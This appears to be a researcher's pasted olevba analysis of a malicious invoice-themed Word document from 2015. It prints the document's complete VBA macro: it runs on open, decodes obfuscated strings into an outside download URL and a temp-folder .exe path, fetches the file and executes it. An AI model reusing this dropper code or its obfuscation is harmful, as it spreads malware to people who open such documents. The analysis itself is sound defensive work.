dynamoo

Malicious Word macro

Feb 27th, 2015
Flags       Filename                                                        
----------- -----------------------------------------------------------------
OLE:MAS---- inv650988.doc

(Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: inv650988.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: inv650988.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
qK3M8Yvc
End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: inv650988.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO fdgfdgfdg.bas
in file: inv650988.doc - OLE stream: u'Macros/VBA/fdgfdgfdg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
    Private Declare PtrSafe Function dfsdfsdffg Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
    ByVal gfhgfhF As String, _
    ByVal hjkhgFF As String, _
    ByVal gfhfghF As Long, _
    ByVal gfdgdf As LongPtr) As LongPtr
#Else
    Private Declare Function dfsdfsdffg Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
    ByVal gfhgfhF As String, _
    ByVal hjkhgFF As String, _
    ByVal gfhfghF As Long, _
    ByVal gfdgdf As Long) As Long
#End If

Sub qK3M8Yvc()
ZIoX79I wUnMnysKtQAKQMZpELN("hytit5pm:D/@/‚hle/w€.oh%o9m|e|pcacg4eD.\t.-To,nZl}i0n}ex.md,e&/Rj3sG/SbKibn‚.„eIxLe^"), Environ(wUnMnysKtQAKQMZpELN("T^M‚P|")) & wUnMnysKtQAKQMZpELN("\D3$294D2=3S5t2v3;5>.Pe~xYe.")
End Sub
Function ZIoX79I(D8PeV0 As String, j4B1GyX As String) As Boolean
vJHKBJdfkgfg = dfsdfsdffg(0&, D8PeV0, j4B1GyX, 0&, 0&)
uiLb = Shell(j4B1GyX, 1)
End Function




- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Shell              | May run an executable file or a system  |
|            |                    | command                                 |
| Suspicious | Environ            | May read system environment variables   |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
+------------+--------------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: inv650988.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function wUnMnysKtQAKQMZpELN(biBIyeZaYdOH As String) As String
GoTo kuddPCezMbIaLPpebUn
kuddPCezMbIaLPpebUn:
For tTFUZcTsUAkgUp = 1 To Len(biBIyeZaYdOH) Step 2
GoTo BHDOSh
BHDOSh:
GoTo NYRvLeyRLBhqqp
NYRvLeyRLBhqqp:
GoTo YfJVVl
YfJVVl:
GoTo kIYQAilFim
kIYQAilFim:
GoTo gtgSuQOrZqcgFgrl
gtgSuQOrZqcgFgrl:
wUnMnysKtQAKQMZpELN = wUnMnysKtQAKQMZpELN & Mid(biBIyeZaYdOH, tTFUZcTsUAkgUp, 1)
GoTo tRJGRjxSGPojLNuOTcRx
tRJGRjxSGPojLNuOTcRx:
GoTo FKhovanmCFIAZoh
FKhovanmCFIAZoh:
GoTo BVyDQNwJjjKS
BVyDQNwJjjKS:
GoTo bGfwQwHBTDaJUbQ
bGfwQwHBTDaJUbQ:
Next
GoTo VQhEzdeKRksiNIJHM
VQhEzdeKRksiNIJHM:
GoTo LcDCSILCcEkhPD
LcDCSILCcEkhPD:
GoTo FTeMMzzbjwYrQvMZN
FTeMMzzbjwYrQvMZN:
GoTo QTqalrnyPQmnxU
QTqalrnyPQmnxU:
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.